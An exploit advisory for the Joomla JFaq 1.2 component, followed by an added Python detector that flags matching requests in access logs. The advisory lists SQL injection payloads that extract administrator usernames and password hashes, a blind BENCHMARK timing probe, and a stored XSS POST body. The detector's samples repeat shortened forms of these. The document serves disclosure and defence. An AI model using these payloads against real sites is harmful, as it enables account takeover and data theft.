# Exploit Title: Joomla Component JFaq 1.2 Multiple Vulnerabilities
# Date: 11 May 2010
# Author: jdc
# Version: 1.2
# Tested on: PHP5, MySQL5
"title" input SQL injection
---------------------------
title', (select concat(username,char(32),password) from #__users where
gid=25 limit 1), 1, 1, 1, 1, 1) -- '

id SQL injection
----------------
requires: magic quotes OFF, Joomla debug mode OFF
?option=com_jfaq
&task=detail
&id=-1' union select concat(username,char(32),password),2,3,4,5,6,7,8,9 from jos_users where gid=25 -- '

id Blind SQL injection
----------------------
requires: magic quotes OFF
?option=com_jfaq
&task=categ
&id=-1' union select benchmark(1000000,md5(5)) -- '

Persistent XSS
--------------
requires: a method to manually POST to form
postdata:
option=com_jfaq
task=add2
visitor_name=foo
categ=1
titlu=bar
question=<img src="f" onerror="alert(1);//"
NOTE: the payload cannot be typed into the form - the editor script strips it, so the POST data has to be submitted directly
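Added example (not part of the advisory): a small log-side detector that flags requests to com_jfaq whose parameters carry the shapes shown above, i.e. a quote followed by UNION SELECT in the id parameter, a BENCHMARK() timing probe, the "', (select" insert-breakout in the title field, and an inline event handler in the question field. The access-log lines and POST bodies are constructed samples with the payloads shortened to their telltale form; the regexes, field names and log format are assumptions, not something the advisory or the component defines.

```python
"""Flag com_jfaq requests matching the injection shapes in the JFaq 1.2 advisory.

Added detection example; sample data below is constructed, not captured traffic.
"""
import re
from urllib.parse import parse_qs

# Indicator regexes (assumed, derived from the advisory's payload shapes).
SQLI_SIGNATURES = {
    "union-select": re.compile(r"'\s*union\s+select\b", re.I),     # id parameter breakout
    "benchmark": re.compile(r"\bbenchmark\s*\(", re.I),             # blind timing probe
    "insert-subselect": re.compile(r"'\s*,\s*\(\s*select\b", re.I),  # title field breakout
}
# Any tag carrying an on*= attribute in a field that should hold plain text.
XSS_SIGNATURE = re.compile(r"<\w+[^>]*\bon\w+\s*=", re.I)

# Combined log format: ip ident user [ts] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def classify(query_string):
    """Return sorted 'param:indicator' hits for a com_jfaq query string or POST body.

    Non-com_jfaq requests return [] so other components do not add noise.
    """
    params = parse_qs(query_string, keep_blank_values=True)
    if params.get("option", [""])[0] != "com_jfaq":
        return []
    hits = set()
    for name, values in params.items():
        for value in values:
            for label, rx in SQLI_SIGNATURES.items():
                if rx.search(value):
                    hits.add(f"{name}:{label}")
            if XSS_SIGNATURE.search(value):
                hits.add(f"{name}:xss-event-handler")
    return sorted(hits)


def scan_access_log(lines):
    """Parse combined-log lines and return (ip, timestamp, hits) for flagged GETs."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        query = m.group("target").partition("?")[2]
        hits = classify(query)
        if hits:
            findings.append((m.group("ip"), m.group("ts"), hits))
    return findings


# Constructed sample access-log lines (payloads shortened to their telltale shape).
SAMPLE_ACCESS_LOG = [
    '192.0.2.10 - - [11/May/2010:10:00:00 +0000] "GET /index.php?option=com_jfaq&task=detail&id=12 HTTP/1.1" 200 5120',
    '192.0.2.11 - - [11/May/2010:10:00:05 +0000] "GET /index.php?option=com_jfaq&task=detail&id=-1%27%20union%20select%201,2,3%20--%20%27 HTTP/1.1" 500 812',
    '192.0.2.11 - - [11/May/2010:10:00:09 +0000] "GET /index.php?option=com_jfaq&task=categ&id=-1%27%20union%20select%20benchmark(1000000,md5(5))%20--%20%27 HTTP/1.1" 200 4011',
    '192.0.2.12 - - [11/May/2010:10:01:00 +0000] "GET /index.php?option=com_content&view=article&id=5 HTTP/1.1" 200 9000',
]

# Constructed POST bodies for task=add2: a legitimate question with an apostrophe
# (must not be flagged), the stored-XSS shape, and the title-field breakout shape.
SAMPLE_POST_BODIES = [
    "option=com_jfaq&task=add2&visitor_name=O%27Brien&categ=1&titlu=Login%20help&question=How%20do%20I%20reset%20my%20password%3F",
    "option=com_jfaq&task=add2&visitor_name=foo&categ=1&titlu=bar&question=%3Cimg%20src%3D%22f%22%20onerror%3D%22alert(1)%3B%2F%2F%22",
    "option=com_jfaq&task=add2&visitor_name=foo&categ=1&titlu=bar%27,%20(select%201),%201)%20--%20%27&question=x",
]


if __name__ == "__main__":
    for ip, ts, hits in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f"{ts} {ip} {' '.join(hits)}")
    for body in SAMPLE_POST_BODIES:
        print(classify(body) or "clean")
```

The apostrophe-only sample (O'Brien) is there on purpose: matching a bare quote would drown the alert in false positives, so each signature requires the quote together with the SQL construct that follows it in the advisory's payloads. Percent-decoding is left to parse_qs, so encoded and literal variants hit the same rule.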